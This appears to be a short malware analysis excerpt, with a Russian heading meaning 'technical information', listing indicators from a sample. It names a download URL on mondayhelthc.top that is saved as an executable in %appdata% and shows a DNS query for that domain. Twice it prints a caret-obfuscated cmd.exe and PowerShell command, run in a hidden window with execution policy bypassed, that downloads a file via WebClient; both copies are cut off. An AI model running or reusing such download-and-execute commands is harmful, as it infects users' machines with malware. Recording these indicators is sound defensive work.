Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^wer^shELL.exe ^-eX^E^cuTI^o^NP^oli^CY BYPasS^ ^-^NoPRo^Fi^lE ^-^W^INd^o^Ws^T^y^Le^ hid^DE^N (n^ew^-obJecT^ ^SYsT^E^m.^n^Et.^weBCL^IEN^T^).dO^w^N^L^O^aD^F^iL^e('http://monday...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "P^o^wer^shELL.exe ^-eX^E^cuTI^o^NP^oli^CY BYPasS^ ^-^NoPRo^Fi^lE ^-^W^INd^o^Ws^T^y^Le^ hid^DE^N (n^ew^-obJecT^ ^SYsT^E^m.^n^Et.^weBCL^IEN^T^).dO^w^N^L^O^aD^F^iL^e('http://monday...' (со скрытым окном)